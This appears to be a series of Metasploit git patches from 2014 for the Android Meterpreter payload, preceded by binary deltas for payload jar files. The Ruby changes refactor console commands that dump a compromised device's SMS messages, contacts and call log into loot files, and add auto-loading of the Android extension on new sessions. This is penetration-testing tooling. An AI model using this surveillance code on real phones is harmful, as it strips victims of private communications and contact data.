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
Lk#A}K8_j<K<Q{Mf

delta 4546
zcmai&dvH|M9mjva``Ej8v)OEJHrecEliloQL*C@UBY_P`6onFl1cQbMR48bpvH}AJ
zD!Ne_WIz$U7;T%@Sc~E)wra-OisE}vVWJf~IO2oac9_wjb;hb~aoX=Wdx4Dq^kzQy
z`}>{qJLjJJJCEJ$a|?gHuzdBJ&7Q`V>9p~i(6Wi%#hn8;HMvISChvPEkl6N%qdR*l
z?kO*5>#HRCjEL5OIpB;+)CB!XBl1E!4Wi}HF{laM;UU^uLbU&>wFR7sz?uVAfm^`O
zz(Mda_!9gVgd#-cpb|8IKCl$51slL7um#)<ZUx)HE^rTc0E~iHz$x%K_&fLtgi9$y
zWu-*TU>;ZoZU<xF5O@VlfWH7LBk}+XL_reNg6SXy=7N53J-88U19yW_@Gv+E{scY&
ze+8$(cV!u({3zZK#6bgS0&SoJ`~dWVey|)|4Tiuj@GI~%I0PoZ3Gg}i8W=J33F4p*
zw18GH8+3q+Ko3})!EFGn1lNNha0}Q5b^;rWf_>m|@Emv<ybV4CpMo#I*We5=%ZZ9W
z1k{6O&<VOhA6N<2f(>8@WPXC%Zg4Lc0sFv{;16H|oB*eR8b|s;J}3qiU<Q~E`oJ=9
z4Oj~{fUV#*upR6Id%-Ap1iT1d2S?*%tJ?eJeMIy_@FTDqtN~YpYrv1epw0R>8L_61
z1&I9679cLsa=NsLmN@ni#9Z#!XJB99*jnLv+dIh)z`oLniA*Z5nq)T?Vx^w#sC80>
z7*M~{xN}lR^C!jhO|q9wvR6;CuZO+N>1X4l@~!7=Bx4(#rB2YDum>D_FKm&&89-cD
z0bw7+;Lh4&pevp7F~o~3&IaOgBU+pc9;%{G?Bzx@b16J8F)fx_L6=F@kOWcQKrcb_
zP@jf|z#BlNBEpda4byL-8vgE)>LMHJq7qr}qI!A`zCk*TK;2F|^Sn0GE>xIKM;=PZ
zh8_gGjPe{OQ0Q5I!mf7*Gh0yWr3gJDwVEE2>Z9kS7SW529&&WT(RZZQ(YsPZ^hao}
z^ORhwp&O-NLqk#<X^+$j`bg?jItlerk^QQ>JhTsX5QmjWMGy%+D3$32`#X1V@HTiM
zs-ta=?vR>GcSFNeDqDr|<gL;#qC2Hl(VwBE$jEM~9=cbmMfXe1p(mkHwEI0YhA9}g
zZ#IL~o8VPonjV(gK<`QQ(fd+!>A0gG*e{sD%nk68luudB)>dMg-$MBmCmU0!n2y4)
zLY^OjR-^nDN4HBgXs^^MbXaPP-iFptxqP=8OuMMB!L&aBt;J|XrfR8R1w93$-g!{N
zIaTO4C~w5j-jrHNN1#m<p!=j2(odz<(iqeY@&S$)dAS_5?Wa6JbAjVMXuk`u8{RbR
ziv#wTjyD(Hi*|lauv*mh!8?*98V0%W8Hj#gL-{4pjnIJIn-es9;N1zY*<PO$%m{B3
zUaFGlF0>VUZSt5z{S&C4k9u(_U>4%KfUp-hws>BzQ#JryImx~bwy57Em8E?QgF`ay
zf<S)wgRD*K#KW;T75RtH^|;;ajb~1wTBPPmW`xX=Aue>Hg43vrqQv69%a|<9(xZAC
zr5hK}g}PTY8l!lK!L972_5KpX`zTj6n$!MPJfiBK>*aw^^>uc5KGZWu3&jA%aB~uJ
zh!!3?Up`cED*X0IZ%KI(s>KY(amK9kUk+;!i(Ymjo0r(7xj~NE({rb0JQ#+Kh?!{f
zvS?$5u!ZnFC{~L$Y5!E*y?WeCqNfW)N$et=o?dee4v=(guBbJ`^gCHD?6m)4QKtUC
z7SCo|WX?C?w7(kJ^q7e~Gf`OuJ8o8BAhX3|vvoMb&ebU)Iml+zH6UjmtxeNm*TIf!
zVbnEZ*QR4Fc)_&4S>Bs)k7G+jG%w1g!^?QJb$v-{T#}Ae;y@DPpDD(V>Uz<U^AOAN
z!#qLO1&MeoS!zTJQjeynRzXCIWUWL*)3R1eM4Kh8bmI&PDPGg+O60eZrS!O1v5I;O
zc3G7@Zmw}zGb|%9gkThj)nT#^>DMt)Vp0!dTEzMeD~s%$yyZFH!k;31O|fstD~c#M
z-c<#oYsbrY)O73$Y9^18j-{x=ekd<dm|uZ!BWPgdTJx=lm18MkW0n0u-Vk4F_xkI3
z)Xw;W)r}N3ZpK2KhJ(dxgxw!e;>}iyc<QLfW9Eo=xWn`siNkI7A%7dsvj63uQr?fA
zJH=33%gLITj&<OG_qx*lE=-(P3A<L<UHQG~S+u^hfO>Dl@^%?liRF!B@87sln^?0P
zoh3Gq*f6`%-#pl>G&i+r9eBmHazq+tBdpy{mY!JBiVZY_I(08&Lt%SmH&hoQ#C95_
zd#%|a&A7nXMPG@o#O~6l>NIxrA}heJ*=wvs&Rcj^8J-p9Rkm$4N7(RNT=gwVu<zus
z!eU4Y{1f&`tB^mozp<(_e?v13WoP%g8!^KF9Od=U*v3X`)o?nmi{hv?IIiR(HiCY_
z+Cq$E0MT9*LoZA$X(!9oqv)=<s~#~+khFB?GP-b0+J7a|;nmWyrPPJ>+mAC}tO%7<
zktv))_Co~)^@YyKC91?i5my9dVmKDI$!wgJ8XAeK+&)=Qz%_PmAjnh2y?mMzdG<y2
z=g7cww{iQTK*D?pr9~)v$zC4_CWUwSdvV9U=YMJ+2$Zx;qp5O4VpIZTN2W54`4TCu
zkRPWoaAo~g`#*tNtg9)7T^&<VDq4wer$T2qI@3{c%!*dC(TjM$6t&CbXM1XX=F!5H
zy4_GR{&b|m$h^jeFO^DBEtBEHacKCWDzDesrRzKEJCx0(^{TRiW0&d*EfNuZxOF4r
zFoWW@g<nMvWhx(Mg;}KsSsCnar+uuA@iRQk<EUjtH%C<cSx#~&PgQpb%~yFlC%ZGM
zc^fPBD&5MhDG@hEHE&9Gt8}ikeLz)qa(ED`?dFnHY7W8(Xj@d;8tm50C%CKyEhac2
zdQb*&V~k(rLfvFjcd?-xEASDt!SMY<r2`nJTPKxaG;Fa?CnA}L*{B;(`E{;z-k_cf
zbK7YcDOpgiDqECCRqZhhR^`RX?u8umtCW-EO24X~;JP~oRo6#c!=XTGAa%d0j&bqk
zlrmJRt9Y`@<)Wh^v*W6=kCWr7x}TFHs`fb7j;M@Kq~)0mm+sP8SI|P!^)Qlwgk$au
z-z9?@tu1Ro=r*oqoZfeIkErU;*-%2;(L%-axcFL~vvbtr%+X!=uLeoa&+CYWdYs<o
zVJZyYb?>DJCzy{e<qzR@<BfjFO&MhPdG-ye>Kokr<>vP6SZI#2X(K`}%u1_hHcuJl
z!)S<)Hr#T>&4b$<QY`+I!^KL0a-HTrz-3uKq!gk!!o^V~A4aiX)`t#oaKkz4m=fp{
zK}vC6vCkD$g3E&|f{V2N;3{5?Wt@?p=ON?PVeM29%bne@hKoJg1I2Kd_r!9BhqZ&n
zUOrwds&nCuhkSg*{v;V{KNVtx?+CMdEX<zcVK%=gW%sc%_KZi_vnS5x6A3ntSFq<y
z1)ImP=M^o27JDnPs_f~N^Ok;w{j&~;y)y@hUp>U0Y69Yy4{@4!L8l=;lFt7EB2J>S
zzk;avZX|qhhHwn05bRU-`<2nTqWAsyFG+Pu<u@zX;=76Xrl!LdPZr+{3AX6b7B+em
JJ74@J^FJg|O;P{=

diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc
index 03f6c44d2873fe60ae877cb150946896a918e315..0ef9aa31f6c93645717d0e187c8651e0a63b6f08 100644
GIT binary patch
delta 47
ycmX@Ya)O1GiGhc~V<M|N69dymzYUDS77RWN3=B*_%m~CbK&&#cQGK!rlK=q5tOtz%

delta 47
ycmX@Xa)gDIiGhc~Wg@FP(;vo-ej6BtO&B~F7#Ns<m=TCAfLLK-qw-`6CIJBDSO|0g

diff --git a/data/android/meterpreter.jar b/data/android/meterpreter.jar
index 0bba1111b84526aff85729103dceb41f62166cbe..2750ad1f42c98bd62216c33740f6ec9f0514e5dc 100644
GIT binary patch
delta 72
zcmcb8l<D?SCY}IqW)=|!4j}YwnaFdD2}oXf1|&D{VVukYq668~W&`QTl?z=!)c%F}
OAj)7-28f!q$Poa8R2n@1

delta 72
zcmcb8l<D?SCY}IqW)=|!4j^RAn#gmE2}oXf1|&D{VVukYq668~W&`QTl?z=!)c%F}
OAj)7-28f!q$PoY~G#4!Z

diff --git a/data/android/metstage.jar b/data/android/metstage.jar
index 84f1e464710d468539db001c2f58fe9f860acd3c..bbb5fa120ef17a83f2a6381dc9b7f9fcacc7daeb 100644
GIT binary patch
delta 41
rcmdnZx0{bAz?+#xgn<JH-CHK|bTPTNY@8v*2Bao$VRHddzt|iB)nyBe

delta 41
scmdnZx0{bAz?+#xgn<JH|7K3)>0<huxp9UR8<3j3h0O&-{bF+j0R1ct_y7O^

diff --git a/data/android/shell.jar b/data/android/shell.jar
index 459491b3d1308b22e97e1270e302ed8829c1d96c..5eed5652203a3e282b3219c1771f5940470116a5 100644
GIT binary patch
delta 41
rcmdnXx0jD6z?+#xgn<JH-C8E{bTPTLY@8v(2Bao$V{-vff7l!W)&2{T

delta 41
scmdnXx0jD6z?+#xgn<JH|71?&>0<hmxp9UJ8<3j3jm-r_{b6$i0R6=c{r~^~


From 9f0bf6752128cc92b5fb3abcb8df41916734a769 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Mon, 28 Jul 2014 07:49:46 +0200
Subject: [PATCH 174/321] fixing minor bugs

---
 .../ui/console/command_dispatcher/android.rb  | 62 +++++++++----------
 1 file changed, 31 insertions(+), 31 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 7f451653e5..c273e5bd29 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -107,19 +107,19 @@ class Console::CommandDispatcher::Android
 
         ::File.open(path, 'wb') do |fd|
 
-          fd.write('\n=====================\n')
-          fd.write('[+] Sms messages dump\n')
-          fd.write('=====================\n\n')
+          fd.write("\n=====================\n")
+          fd.write("[+] Sms messages dump\n")
+          fd.write("=====================\n\n")
 
           time = Time.new
-          fd.write('Date: #{time.inspect}\n')
+          fd.write("Date: #{time.inspect}\n")
           fd.write("OS: #{info['OS']}\n")
-          fd.write('Remote IP: #{client.sock.peerhost}\n')
-          fd.write('Remote Port: #{client.sock.peerport}\n\n')
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
 
           smsList.each_with_index { |a, index|
 
-            fd.write('##{(index.to_i + 1).to_s()}\n')
+            fd.write("##{(index.to_i + 1).to_s()}\n")
 
             type = 'Unknown'
             if a['type'] == '1'
@@ -143,14 +143,14 @@ class Console::CommandDispatcher::Android
               status = 'SMS_REPLACED_BY_SC'
             end
 
-            fd.write('Type\t: #{type}\n')
+            fd.write("Type\t: #{type}\n")
 
             time = a['date'].to_i / 1000
             time = Time.at(time)
 
             fd.write("Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n")
             fd.write("Address\t: #{a['address']}\n")
-            fd.write('Status\t: #{status}\n')
+            fd.write("Status\t: #{status}\n")
             fd.write("Message\t: #{a['body']}\n\n")
           }
         end
@@ -162,7 +162,7 @@ class Console::CommandDispatcher::Android
 
         return true
       rescue
-        print_error('Error getting messages')
+        print_error("Error getting messages: #{$!}")
         return false
       end
     else
@@ -204,44 +204,44 @@ class Console::CommandDispatcher::Android
 
         ::File.open(path, 'wb') do |fd|
 
-          fd.write('\n======================\n')
-          fd.write('[+] Contacts list dump\n')
-          fd.write('======================\n\n')
+          fd.write("\n======================\n")
+          fd.write("[+] Contacts list dump\n")
+          fd.write("======================\n\n")
 
           time = Time.new
-          fd.write('Date: #{time.inspect}\n')
+          fd.write("Date: #{time.inspect}\n")
           fd.write("OS: #{info['OS']}\n")
-          fd.write('Remote IP: #{client.sock.peerhost}\n')
-          fd.write('Remote Port: #{client.sock.peerport}\n\n')
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
 
           contactList.each_with_index { |c, index|
 
-            fd.write('##{(index.to_i + 1).to_s()}\n')
+            fd.write("##{(index.to_i + 1).to_s()}\n")
             fd.write("Name\t: #{c['name']}\n")
 
             if c['number'].count > 0
               (c['number']).each { |n|
-                fd.write('Number\t: #{n}\n')
+                fd.write("Number\t: #{n}\n")
               }
             end
 
             if c['email'].count > 0
               (c['email']).each { |n|
-                fd.write('Email\t: #{n}\n')
+                fd.write("Email\t: #{n}\n")
               }
             end
 
-            fd.write('\n')
+            fd.write("\n")
           }
         end
 
         path = ::File.expand_path(path)
-        print_status('Contacts list saved to: #{path}')
+        print_status("Contacts list saved to: #{path}")
         Rex::Compat.open_file(path)
 
         return true
       rescue
-        print_error('Error getting contacts list')
+        print_error("Error getting contacts list: #{$!}")
         return false
       end
     else
@@ -320,19 +320,19 @@ class Console::CommandDispatcher::Android
 
         ::File.open(path, 'wb') do |fd|
 
-          fd.write('\n=================\n')
-          fd.write('[+] Call log dump\n')
-          fd.write('=================\n\n')
+          fd.write("\n=================\n")
+          fd.write("[+] Call log dump\n")
+          fd.write("=================\n\n")
 
           time = Time.new
-          fd.write('Date: #{time.inspect}\n')
+          fd.write("Date: #{time.inspect}\n")
           fd.write("OS: #{info['OS']}\n")
-          fd.write('Remote IP: #{client.sock.peerhost}\n')
-          fd.write('Remote Port: #{client.sock.peerport}\n\n')
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
 
           log.each_with_index { |a, index|
 
-            fd.write('##{(index.to_i + 1).to_s()}\n')
+            fd.write("##{(index.to_i + 1).to_s()}\n")
 
             fd.write("Number\t: #{a['number']}\n")
             fd.write("Name\t: #{a['name']}\n")
@@ -343,12 +343,12 @@ class Console::CommandDispatcher::Android
         end
 
         path = ::File.expand_path(path)
-        print_status('Call log saved to: #{path}')
+        print_status("Call log saved to: #{path}")
         Rex::Compat.open_file(path)
 
         return true
       rescue
-        print_error('Error getting call log')
+        print_error("Error getting call log: #{$!}")
         return false
       end
     else

From 283046b25d0ddfc64eb4895d1835ab73e71f894c Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Mon, 28 Jul 2014 10:49:50 +0200
Subject: [PATCH 175/321] fixing auto load on new session

---
 lib/msf/base/sessions/meterpreter_android.rb  |  36 ++++
 lib/msf/base/sessions/meterpreter_java.rb     |   6 +-
 .../ui/console/command_dispatcher/android.rb  | 196 +++++++++---------
 .../payloads/stages/android/meterpreter.rb    |   9 +-
 4 files changed, 134 insertions(+), 113 deletions(-)
 create mode 100644 lib/msf/base/sessions/meterpreter_android.rb

diff --git a/lib/msf/base/sessions/meterpreter_android.rb b/lib/msf/base/sessions/meterpreter_android.rb
new file mode 100644
index 0000000000..6252737ed1
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+require 'msf/base/sessions/meterpreter_options'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
+
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.platform = 'java/android'
+  end
+  def load_android
+    original = console.disable_output  
+    console.disable_output = true
+    console.run_single('load android')
+    console.disable_output = original
+  end
+end
+
+end
+end
+
diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index bb50e5cdeb..bd4bd9436c 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -11,6 +11,7 @@ module Sessions
 #
 ###
 class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
+
   def supports_ssl?
     false
   end
@@ -22,11 +23,6 @@ class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
     self.platform      = 'java/java'
     self.binary_suffix = 'jar'
   end
-  def load_android
-    self.platform = 'java/android'  
-    console.disable_output = true
-    console.run_single('load android')
-  end
 end
 
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index c273e5bd29..7e4289167f 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+require 'msf/core'
 require 'rex/post/meterpreter'
 
 module Rex
@@ -12,8 +13,8 @@ module Ui
 ###
 
 class Console::CommandDispatcher::Android
-
   include Console::CommandDispatcher
+  include Msf::Auxiliary::Report
 
   def initialize(shell)
     super
@@ -22,7 +23,7 @@ class Console::CommandDispatcher::Android
   #
   # List of supported commands.
   #
- def commands
+  def commands
     all = {
       'dump_sms'          => 'Get sms messages',
       'dump_contacts'     => 'Get contacts list',
@@ -59,7 +60,7 @@ class Console::CommandDispatcher::Android
     device_shutdown_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: device_shutdown [options]\n')
+        print_line('Usage: device_shutdown [options]')
         print_line('Shutdown device.')
         print_line(device_shutdown_opts.usage)
         return
@@ -88,7 +89,7 @@ class Console::CommandDispatcher::Android
     dump_sms_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_sms [options]\n')
+        print_line('Usage: dump_sms [options]')
         print_line('Get sms messages.')
         print_line(dump_sms_opts.usage)
         return
@@ -105,58 +106,55 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open(path, 'wb') do |fd|
+        data = String::new
+        data << "\n=====================\n"
+        data << "[+] Sms messages dump\n"
+        data << "=====================\n\n"
 
-          fd.write("\n=====================\n")
-          fd.write("[+] Sms messages dump\n")
-          fd.write("=====================\n\n")
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
 
-          time = Time.new
-          fd.write("Date: #{time.inspect}\n")
-          fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+        smsList.each_with_index { |a, index|
 
-          smsList.each_with_index { |a, index|
+          data << "##{(index.to_i + 1).to_s()}\n"
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
+          type = 'Unknown'
+          if a['type'] == '1'
+            type = 'Incoming'
+          elsif a['type'] == '2'
+            type = 'Outgoing'
+          end
 
-            type = 'Unknown'
-            if a['type'] == '1'
-              type = 'Incoming'
-            elsif a['type'] == '2'
-              type = 'Outgoing'
-            end
+          status = 'Unknown'
+          if a['status'] == '-1'
+            status = 'NOT_RECEIVED'
+          elsif a['status'] == '1'
+            status = 'SME_UNABLE_TO_CONFIRM'
+          elsif a['status'] == '0'
+            status = 'SUCCESS'
+          elsif a['status'] == '64'
+            status = 'MASK_PERMANENT_ERROR'
+          elsif a['status'] == '32'
+            status = 'MASK_TEMPORARY_ERROR'
+          elsif a['status'] == '2'
+            status = 'SMS_REPLACED_BY_SC'
+          end
 
-            status = 'Unknown'
-            if a['status'] == '-1'
-              status = 'NOT_RECEIVED'
-            elsif a['status'] == '1'
-              status = 'SME_UNABLE_TO_CONFIRM'
-            elsif a['status'] == '0'
-              status = 'SUCCESS'
-            elsif a['status'] == '64'
-              status = 'MASK_PERMANENT_ERROR'
-            elsif a['status'] == '32'
-              status = 'MASK_TEMPORARY_ERROR'
-            elsif a['status'] == '2'
-              status = 'SMS_REPLACED_BY_SC'
-            end
+          data << "Type\t: #{type}\n"
 
-            fd.write("Type\t: #{type}\n")
+          time = a['date'].to_i / 1000
+          time = Time.at(time)
 
-            time = a['date'].to_i / 1000
-            time = Time.at(time)
-
-            fd.write("Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n")
-            fd.write("Address\t: #{a['address']}\n")
-            fd.write("Status\t: #{status}\n")
-            fd.write("Message\t: #{a['body']}\n\n")
-          }
-        end
-
-        path = ::File.expand_path(path)
+          data << "Date\t: #{time.strftime('%Y-%m-%d %H:%M:%S')}\n"
+          data << "Address\t: #{a['address']}\n"
+          data << "Status\t: #{status}\n"
+          data << "Message\t: #{a['body']}\n\n"
+        }
 
+        path = store_loot("android.sms", "text/plain", client.sock.peerhost, data, "sms.txt", "Android SMS Dump")
         print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
         Rex::Compat.open_file(path)
 
@@ -185,7 +183,7 @@ class Console::CommandDispatcher::Android
     dump_contacts_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_contacts [options]\n')
+        print_line('Usage: dump_contacts [options]')
         print_line('Get contacts list.')
         print_line(dump_contacts_opts.usage)
         return
@@ -202,40 +200,38 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open(path, 'wb') do |fd|
+        data = String::new
+        data << "\n======================\n"
+        data << "[+] Contacts list dump\n"
+        data << "======================\n\n"
 
-          fd.write("\n======================\n")
-          fd.write("[+] Contacts list dump\n")
-          fd.write("======================\n\n")
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
 
-          time = Time.new
-          fd.write("Date: #{time.inspect}\n")
-          fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+        contactList.each_with_index { |c, index|
 
-          contactList.each_with_index { |c, index|
+          data << "##{(index.to_i + 1).to_s()}\n"
+          data << "Name\t: #{c['name']}\n"
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
-            fd.write("Name\t: #{c['name']}\n")
+          if c['number'].count > 0
+            (c['number']).each { |n|
+              data << "Number\t: #{n}\n"
+            }
+          end
 
-            if c['number'].count > 0
-              (c['number']).each { |n|
-                fd.write("Number\t: #{n}\n")
-              }
-            end
+          if c['email'].count > 0
+            (c['email']).each { |n|
+              data << "Email\t: #{n}\n"
+            }
+          end
 
-            if c['email'].count > 0
-              (c['email']).each { |n|
-                fd.write("Email\t: #{n}\n")
-              }
-            end
-
-            fd.write("\n")
-          }
-        end
-
-        path = ::File.expand_path(path)
+          data << "\n"
+        }
+  
+        path = store_loot("android.contacts", "text/plain", client.sock.peerhost, data, "contacts.txt", "Android Contacts Dump")
         print_status("Contacts list saved to: #{path}")
         Rex::Compat.open_file(path)
 
@@ -263,7 +259,7 @@ class Console::CommandDispatcher::Android
     geolocate_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: geolocate [options]\n')
+        print_line('Usage: geolocate [options]')
